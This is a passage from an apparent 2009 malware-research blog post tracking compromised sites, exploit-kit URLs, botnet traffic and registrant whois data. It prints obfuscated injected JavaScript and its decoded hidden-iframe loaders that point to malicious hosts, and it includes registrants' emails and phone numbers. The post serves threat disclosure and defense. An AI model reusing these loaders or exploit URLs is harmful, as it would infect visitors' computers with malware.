cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/haitou.php<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=29b0af53df0979e7246d9e89e09352cc&t=1240189409&type=js" target="_blank">Analysis</a><br /><br />Requests:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/in.php<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=6f6f7fb6acc398f4a4e0d55b8d675936&t=1240189407&type=js" target="_blank">Analysis</a><br /><br />Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://www.rogercombs.org/index.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/team.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=022ec04155a750ee3f480d2f85791fc7&t=1240189403&type=js" target="_blank">Analysis</a><br /><br />Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br 
/>hxxp://77.221.133.172/.if/go.html?<br />hxxp://by.ru/info/?where <br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/wallz.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=713f99048cdb15abc6d8d4362f64dc89&t=1240189401&type=js" target="_blank">Analysis<br /><br /></a>Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://bizoplata.ru/post.html<br />hxxp://by.ru/info/?where<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/live/index2.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=ecbd15e4abab1929620bc7ce8baa6226&t=1240189400&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://utevox.site90.com/f/index.php<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br /></td></tr></table><p>************<br />Infected page: <br /></p><table 
width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/live/imagepages/image1.html<br /></td></tr></table><br /><br /><a href="http://wepawet.iseclab.org/view.php?hash=cf17de61655dcbbe49b2b156a4657ef8&t=1240189397&type=js" target="_blank">Analysis</a><p>Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/members/imagepages/image1.html<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=af2a41a9e85c52ff2296499b78cacdd7&t=1240189395&type=js" target="_blank">Analysis</a></p><p> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://analytics-google.info/s/urchin.js<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="441" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="437" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo/team/imagepages/image1.html<br /></td></tr></table><p><a 
href="http://wepawet.iseclab.org/view.php?hash=3f78714d6c50cff7fb1bd7cd83ab2101&t=1240189392&type=js" target="_blank">Analysis</a></p><p>On this page the domain appears to have been previously involved in the Asprox malware campaign. As you can see, the fgg.js and script.js includes are still present on the page.<br /><br />However, none of these are responding.</p><p><a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2002" target="_blank">Finjan report</a><br /><a href="http://www.google.com/search?q=%22fgg.js%22&hl=en&rlz=1G1GGLQ_ENBE320&start=10&sa=N" target="_blank">Google Search for fgg.js</a><br /><a href="hxxp://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENBE320&q=www.netcfg9.ru&btnG=Google+Search&aq=f&oq=" target="_blank">Google Search for www.netcfg9.ru</a><br /></p><p> hxxp://www.jve4.ru/fgg.js <br /> hxxp://www.nmr43.ru/fgg.js <br /> hxxp://www.mj5f.ru/script.js <br /> hxxp://www.vswc.ru/script.js<br /> hxxp://www.pkseio.ru/script.js <br /> hxxp://www.4log-in.ru/script.js <br /> hxxp://www.netcfg9.ru/script.js <br /> hxxp://www.sitevgb.ru/script.js<br /> hxxp://www.errghr.ru/script.js <br /> hxxp://www.81dns.ru/script.js <br /> hxxp://mixbunch.cn/thread.html <br /> hxxp://mixbunch.cn/golf.html<br /> hxxp://tixwagoq.cn/in.cgi?4 <br /> hxxp://paylayos.cn/nuc/index.php<br /> hxxp://mixbunch.cn/bowling.html <br /> hxxp://sunmaiamibich.ru/pupu/in.php<br /> hxxp://famajormusic.ru/jjkj/pdf.php<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn-EpxX4MQU-IHrc2cXbLgz5BciZI5aXzSWDvH42xhlZ0QtQJLS9HoH6Ji99u30TeLuVTzYgChHKHt-fz-RkZ4Dyhyphenhyphenhq7OtQHDBa_j_dGXh89FP1smwJ7FyFBw4tZnITTbZeffNR5pSoFk/s1600-h/image1.html-Asprox.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 300px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn-EpxX4MQU-IHrc2cXbLgz5BciZI5aXzSWDvH42xhlZ0QtQJLS9HoH6Ji99u30TeLuVTzYgChHKHt-fz-RkZ4Dyhyphenhyphenhq7OtQHDBa_j_dGXh89FP1smwJ7FyFBw4tZnITTbZeffNR5pSoFk/s320/image1.html-Asprox.jpg" 
border="0" alt=""id="BLOGGER_PHOTO_ID_5326698005512053042" /></a><br /></p><p>************<br />Infected page: </p><p>hxxp://tochtonenado.com/yes/index.php<br /> hxxp://tochtonenado.com/yes/load.php?stat=Windows</p><p><a href="hxxp://wepawet.cs.ucsb.edu/view.php?type=js&hash=bc2e9aa85b7f80634e5b7e5df0e76324&t=1238341867" target="_blank">Analysis</a><br /><br />Trojan Waledac.GEN</p><p><a href="http://anubis.iseclab.org/?action=result&task_id=19f0382ef717247d4913db3864368582c" target="_blank">Anubis Report</a></p><p>Botnet Controller</p><p> 89.149.244.140:80 - [djbobroff.ru] <br /> Request: GET /spm/index.php?id=584E5E43 <br /> Response: 200 "OK" <br /> Request: GET /spm/index.php?id=584E5E43&download=0000138F <br /> Response: 200 "OK" <br /> Request: POST /spm/index.php?id=584E5E43&mid=5007 <br /> Response: 200 "OK" <br /><br /> C:\WINDOWS\system32\DRIVERS\asyncmac.sys<br /></p><p>*****************</p><p> Exploits:<br /></p><table width="430" border="0" cellspacing="0" cellpadding="0"><tr><td width="269">hxxp://5rublei.com/unique/index.php</td><td width="161"><a href="http://wepawet.iseclab.org/view.php?hash=1caa44fb445de12a00abd26402ae5d28&t=1240188306&type=js" target="_blank">Analysis</a> - <a href="http://www.virustotal.com/analisis/eee1d92f291ebf12eb9a648d5bff3e1c" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19f0382ef717247d4913db3864368582c" target="_blank">Anubis</a></td></tr><tr><td>hxxp://bizoplata.ru/ballast.html</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=19f8e2944f3848c2b9980020300952db&t=1240264005&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://bizoplata.ru/courier.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=93cc42c58cbe763222e43fa8f6375023&t=1239920723&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://bizoplata.ru/pay.html?</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=38182f76de5bcf5d090cdd9b36424d74&t=1240263970&type=js" 
target="_blank">Analysis</a></td></tr><tr><td>hxxp://bizoplata.ru/post.html</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=64a744ae04d96b2b2dd8bd3d2d08dc22&t=1239390474&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://dasretokfin.com/load.php</td><td><a href="http://jsunpack.jeek.org/dec/go?url=dasretokfin.com_load.php" target="_blank">Analysis</a></td></tr><tr><td>hxxp://mixbunch.cn/thread.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&t=1240199423&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://mixbunch.cn/golf.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=a89ecbd89cd1fd83341ebbfe467dca53&t=1240199761&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://mixbunch.cn/bowling.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=022e3c32f124fd0c0e50939b5399a6f8&t=1240250684&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://peskufex.cn/ss/in.cgi?2</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=64a744ae04d96b2b2dd8bd3d2d08dc22&t=1239390474&type=js" target="_blank">Source</a></td></tr><tr><td>hxxp://startdontstop.ru/bigmac.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=add37e12cc791e69d3e0670f58f39901&t=1239890697&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://sunmaiamibich.ru/pupu/in.php</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=cea26289df93bc2a5fd52c0d8767305a&t=1240188628" target="_blank">Analysis</a></td></tr><tr><td>hxxp://sunmaiamibich.ru/pupu/load.php</td><td><a href="http://www.virustotal.com/analisis/2bab5a949c6e83dba25eb4bda2b90493" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19f86524a316a29d4e9dfd0d992132ee9" target="_blank">Anubis</a></td></tr><tr><td>hxxp://tixwagoq.cn/in.cgi?4</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=8717fc57e750e4948877ea1496eeebe0&t=1240264417&type=js" 
target="_blank">Analysis</a></td></tr><tr><td>hxxp://tochtonenado.com/yes/index.php </td><td><a href="http://wepawet.iseclab.org/view.php?hash=bc2e9aa85b7f80634e5b7e5df0e76324&t=1238341867&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://tochtonenado.com/yes/load.php</td><td><a href="http://anubis.iseclab.org/?action=result&task_id=19f0382ef717247d4913db3864368582c&format=html" target="_blank">Anubis</a></td></tr><tr><td>hxxp://tochtonenado.com/yes/include/spl.php</td><td><a href="http://wepawet.iseclab.org/view.php?hash=256e6b1f2bb2984111f9a742fc768806&t=1240264874&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://utevox.site90.com/f/index.php</td><td><a href="http://jsunpack.jeek.org/dec/go?url=utevox.site90.com_f_index.php" target="_blank">Analysis</a></td></tr><tr><td>hxxp://utevox.site90.com/f/load.php</td><td>dead</td></tr></table><p><br /> 91.212.41.91<br /></p><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="28">hxxp://<span class="scam_website">mixbunch.cn</span><br /> hxxp://<span class="scam_website">sunmaiamibich.ru</span></td></tr></table><br />91.212.65.7<br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="14">hxxp://<span class="scam_website">peskufex.cn</span></td></tr></table><br />95.129.144.228<br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="42">hxxp://<span class="scam_website">5rublei.com</span><br /> hxxp://<span class="scam_website">dasretokfin.com</span><br /> hxxp://<span class="scam_website">tochtonenado.com</span></td></tr></table><br />95.129.144.13<br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="20">hxxp://<span class="scam_website">bizoplata.ru</span><br /> hxxp://<span class="scam_website">startdontstop.ru</span><br /></td></tr></table><p>64.235.52.170<br /></p><table width="231" border="0" cellspacing="0" 
cellpadding="0"><tr><td width="231" height="20">hxxp://<span class="scam_website">utevox.site90.com</span><br /></td></tr></table><br />************************<br /><br />Domain Name: <span class="scam_website">mixbunch.cn</span><br />ROID: 20081108s10001s82359461-cn<br />Domain Status: clientTransferProhibited<br />Registrant Organization: Raymond Keaton <br />Registrant Name: Raymond Keaton<br />Administrative Email: Keaton@cybernauttech.com<br />Sponsoring Registrar: 广东时代互联科技有限公司<br />Name Server:ns1.softwaresupport-group.com<br />Name Server:ns2.softwaresupport-group.com<br />Registration Date: 2008-11-08 16:06<br />Expiration Date: 2009-11-08 16:06<br /><br />domain: <span class="scam_website">sunmaiamibich.ru</span><br />type: CORPORATE<br />nserver: ns1.softwaresupport-group.com.<br />nserver: ns2.softwaresupport-group.com.<br />state: REGISTERED, DELEGATED<br />person: Private person<br />phone: +7 910 3478712<br />e-mail: dmitrijstanislavskij@yandex.ru<br />registrar: REGRU-REG-RIPN<br />created: 2009.04.16<br />paid-till: 2010.04.16<br />source: TC-RIPN<br /><br />Domain Name: <span class="scam_website">peskufex.cn</span><br />ROID: 20090315s10001s50367993-cn<br />Domain Status: clientDeleteProhibited<br />Domain Status: clientTransferProhibited<br />Registrant Organization: 永也进出口公司<br />Registrant Name: 张龙<br />Administrative Email: alvin_555@yeah.net<br />Sponsoring Registrar: 易名中国<br />Name Server:ns2.dnsmytruedns.com<br />Name Server:ns1.dnsmytruedns.com<br />Registration Date: 2009-03-15 15:37<br />Expiration Date: 2010-03-15 15:37<p>Domain Name: <span class="scam_website">5rublei.com</span><br />Registrar: BIZCN.COM, INC.<br />Whois Server: whois.bizcn.com<br />Referral URL: http://www.bizcn.com<br />Name Server: NS1.EVERYDNS.NET<br />Name Server: NS2.EVERYDNS.NET<br />Name Server: NS3.EVERYDNS.NET<br />Name Server: NS4.EVERYDNS.NET<br />Status: clientDeleteProhibited<br />Status: clientTransferProhibited<br />Updated Date: 31-mar-2009<br 
/>Creation Date: 30-jun-2008<br />Expiration Date: 30-jun-2010<br /><br />Domain Name: <span class="scam_website">dasretokfin.com</span><br />Registrar: REGTIME LTD.<br />Whois Server: whois.regtime.net<br />Referral URL: http://www.webnames.ru<br />Name Server: NS1.AFRAID.ORG<br />Name Server: NS2.AFRAID.ORG<br />Name Server: NS3.AFRAID.ORG<br />Name Server: NS4.AFRAID.ORG<br />Status: ok<br />Updated Date: 24-mar-2009<br />Creation Date: 18-feb-2009<br />Expiration Date: 18-feb-2010<br /><br />Domain Name: <span class="scam_website">tochtonenado.com</span><br />Registrar: UK2 GROUP LTD.<br />Whois Server: whois.hostingservicesinc.net<br />Referral URL: http://www.uk2group.com/<br />Name Server: NS1.EVERYDNS.NET<br />Name Server: NS2.EVERYDNS.NET<br />Name Server: NS3.EVERYDNS.NET<br />Name Server: NS4.EVERYDNS.NET<br />Status: clientTransferProhibited<br />Updated Date: 25-mar-2009<br />Creation Date: 25-mar-2009<br />Expiration Date: 25-mar-2010<br /><br />domain: <span class="scam_website">bizoplata.ru</span><br />type: CORPORATE<br />nserver: ns1.sevensearchon.ru<br />nserver: ns2.sevensearchon.ru<br />state: REGISTERED, DELEGATED<br />person: Private Person<br />phone: +7 495 0000000<br />e-mail: tuhov83@mail.ru<br />registrar: CT-REG-RIPN<br />created: 2009.01.23<br />paid-till: 2010.01.23<br />source: TC-RIPN<br /><br />domain: <span class="scam_website">startdontstop.ru</span><br />type: CORPORATE<br />nserver: ns1.sevensearchon.ru.<br />nserver: ns2.sevensearchon.ru.<br />state: REGISTERED, DELEGATED<br />person: Private Person<br />phone: +7 916 7843219<br />e-mail: ale32888049@yandex.ru<br />registrar: NAUNET-REG-RIPN<br />created: 2009.04.14<br />paid-till: 2010.04.14<br />source: TC-RIPN<br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-41824749533840587652009-04-17T10:15:00.000-07:002009-04-19T14:14:40.949-07:00Black Hat SEO - RBN Hacks, p.3<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="502" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="502" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO, exploits, hacks, botnets</span><br /><br /> Triple threats<br /></p><table width="488" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="488"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p><b>WARNING</b>: All sites listed on this page are dangerous (live URLs with exploits) <br /> which lead to trojans being automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. 
<br />(only links are safe)<br /><p>The story about <i>"Hosted JavaScript leading to .cn PDF Malware"</i> which has implicated <span class="scam_website">clarafin[.]info</span>, <span class="scam_website">fabiomotor[.]cn</span> and <span class="scam_website">letomerin[.]cn</span> continues!<br /> <br />New sites appear as intermediaries for distributing malware.<br /><hr />About <span class="scam_website">beebest[.]cn</span>: I will take the domain "cmizziconstruction.com" as an example.<br /><br /><a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=cmizziconstruction.com" target="_blank">The Diagnostic page for cmizziconstruction.com</a>. (Provided by Google Safe Browsing)<br /><br /> In the source code we can see:<br /><br /><table width="206" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="10544" height="404" style="padding:10px"><script>function c274acb4b1h49d2e3646f592(h49d2e3646fd61){ function h49d<br />2e36470534(){return 16;} return (parseInt(h49d2e3646fd61,h49d2e36470534()<br />));}function h49d2e364714d7(h49d2e36471ca8){ function h49d2e36473415(){<br />var h49d2e36473be3=2;return h49d2e36473be3;} var h49d2e364724a8='';h49<br />d2e36474427=String.fromCharCode;for(h49d2e36472c43=0;h49d2e36472c43<<br />h49d2e36471ca8.length;h49d2e36472c43+=h49d2e36473415()){ h49d2e3647<br />24a8+=(h49d2e36474427(c274acb4b1h49d2e3646f592(h49d2e36471ca8.subst<br />r(h49d2e36472c43,h49d2e36473415()))));}return h49d2e364724a8;} var r36=''<br />;var h49d2e36474be1='3C7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E696628<br />216D7'+r36+'96961297'+r36+'B646F637'+r36+'56D656E7'+r36+'42E7'+r36+'7'+<br />r36+'7'+r36+'2697'+r36+'465287'+r36+'56E657'+r36+'363617'+r36+'065282027<br />'+r36+'2533632536392536362537'+r36+'3225363125366425363525323025366<br />5253631253664253635253364253633253332253337'+r36+'2532302537'+r36+'<br />332537'+r36+'32253633253364253237'+r36+'2536382537'+r36+'342537'+r36+<br 
/>'342537'+r36+'302533612532662532662536352537'+r36+'382537'+r36+'34253<br />7'+r36+'322536312537'+r36+'332537'+r36+'302537'+r36+'322536312537'+r36<br />+'392532652536332536662536642532662536392536652532652537'+r36+'302<br />536382537'+r36+'30253366253237'+r36+'2532622534642536312537'+r36+'34<br />2536382532652537'+r36+'322536662537'+r36+'3525366525363425323825346<br />42536312537'+r36+'342536382532652537'+r36+'322536312536652536342536<br />6625366425323825323925326125333425333125333125333325333825323925<br />3262253237'+r36+'253334253338253336253338253636253336253336253237'<br />+r36+'2532302537'+r36+'37'+r36+'2536392536342537'+r36+'34253638253364<br />253333253330253337'+r36+'253230253638253635253639253637'+r36+'25363<br />82537'+r36+'342533642533312533332533342532302537'+r36+'332537'+r36+'<br />342537'+r36+'39253663253635253364253237'+r36+'2537'+r36+'36253639253<br />7'+r36+'332536392536322536392536632536392537'+r36+'342537'+r36+'3925<br />3361253638253639253634253634253635253665253237'+r36+'253365253363<br />2532662536392536362537'+r36+'3225363125366425363525336527'+r36+'29<br />293B7'+r36+'D7'+r36+'6617'+r36+'2206D7'+r36+'969613D7'+r36+'47'+r36+'27<br />'+r36+'5653B3C2F7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E';alert(h49d2e3<br />64714d7(h49d2e36474be1));</script></td></tr></table><p>The deobfuscated code is<br /><br /><table width="477" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="475" height="174" style="padding:10px"><script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%<br />20%6e%61%6d%65%3d%63%32%37%20%73%72%63%3d%27%68%74%7<br />4%70%3a%2f%2f%65%78%74%72%61%73%70%72%61%79%2e%63%6f%<br />6d%2f%69%6e%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f<br />%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%<br />2a%34%31%31%33%38%29%2b%27%34%38%36%38%66%36%36%27%2<br />0%77%69%64%74%68%3d%33%30%37%20%68%65%69%67%68%74%3d<br />%31%33%34%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%<br 
/>6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72<br />%61%6d%65%3e'));}var myia=true;</script><br /></td></tr></table><p>which is an IFRAME</p><table width="200" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="459" height="65" style="padding:10px"><iframe name=c27 src='hxxp://<span class="scam_website">extraspray.com</span>/in.php?'+Math.round(Math.random()*41138)+'4868f66' width=307 height=134 style='visibility:hidden'></iframe></td></tr></table><p><u>Analysis on March 25</u> <br /></p><table width="487" border="0" cellspacing="0" cellpadding="0"><tr><td width="281" height="28">hxxp://<span class="scam_website">extraspray.com</span>/in.php?<br /></td><td width="206"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=687425d9d39cd838a9fcf5f05f37da8f&t=1238026597&type=js" target="_blank">URL Analysis</a></td></tr><tr><td height="40" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/getexe.exe<br />?o=7&t=1238025784&i=2154770527&e=<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="36" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/exploits/x19.php<br />?o=7&t=1238025784&i =2154770527<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="35" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/exploits/x18.php<br />?o=7&t=1238025784&i=2154770527<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="31" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/exploits/x21x1.php<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="35" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/getexe.exe<br />?o=4&t=1238025787&i=2154770527&e=</td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="31" style="border-top:solid 1px #CCC; 
border-bottom:solid 1px #CCC">hxxp://<span class="scam_website">rifnasax.cn</span>/nuc/exe.php</td><td style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=d52f9efb85ed74924aad6cd64720d575&t=1237274961" target="_blank">URL Analysis</a> - <a href="http://www.virustotal.com/analisis/82335932d790a3f0073266d648527e75" target="_blank">VirusTotal</a> (Kryptik)</td></tr></table><p><u>Analysis on April 17 </u></p><table width="487" border="0" cellspacing="0" cellpadding="0"><tr><td width="282" height="24">hxxp://<span class="scam_website">extraspray.com</span>/in.php?<br /></td><td width="205"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=687425d9d39cd838a9fcf5f05f37da8f&t=1239979475&type=js" target="_blank">URL Analysis</a></td></tr><tr><td height="47" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/getexe.exe<br />?o=7&t=1239978315&i=2154770527&e=<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="39" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/exploits/x19.php<br />?o=7&t=1239978315&i=2154770<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="38" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/exploits/x18.php<br />?o=7&t=1239978315&i=2154770527<br /></td><td style="border-top:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=65deff066bed6693c366783d403025e6&t=1239979751&type=js" target="_blank">URL Analysis</a> - <a href="http://www.virustotal.com/analisis/b7cda5ae024b4e54fa1b866a6402d996" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=13c1fb5e0034748c45df92abe9491e274" target="_blank">Anubis</a></td></tr><tr><td height="37" style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/getexe.exe<br 
/>?o=7&t=1239978315&i=2154770527&e=18<br /></td><td style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=65deff066bed6693c366783d403025e6&t=1239979751&type=js" target="_blank">URL Analysis</a> - <a href="http://www.virustotal.com/analisis/b7cda5ae024b4e54fa1b866a6402d996" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=13c1fb5e0034748c45df92abe9491e274" target="_blank">Anubis</a></td></tr></table><br /><p><br />Now with <span class="scam_website">clarafin[.]info</span><br /><br /><a href="http://wepawet.cs.ucsb.edu/view.php?hash=3ec2e92d7f43a9af31325c7609a5d43c&t=1239978396&type=js" target="_blank">Analysis on April 17 (07:26) </a><br /><br /> The source code shows:<br /></p><table width="462" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="460" height="174" style="padding:10px"><script>if (!myia){<br />document.write(unescape('<br />%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%33%<br />32%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%6c<br />%61%72%61%66%69%6e%2e%69%6e%66%6f%2f%74%72%61%<br />66%66%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d<br />%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%<br />72%61%6e%64%6f%6d%28%29%2a%32%35%33%38%35%39%29<br />%2b%27%35%31%66%34%63%38%65%32%66%65%31%27%20%<br />77%69%64%74%68%3d%35%38%39%20%68%65%69%67%68%7<br />4%3d%34%33%31%20%73%74%79%6c%65%3d%27%76%69%73<br />%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%<br />3e%3c%2f%69%66%72%61%6d%65%3e'));<br />}<br />var myia = true;<br /></script><br /></td></tr></table><p> which is the IFRAME for <span class="scam_website">clarafin[.]info</span><br /></p><table width="450" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="448" height="90" style="padding:10px"><iframe name=c32 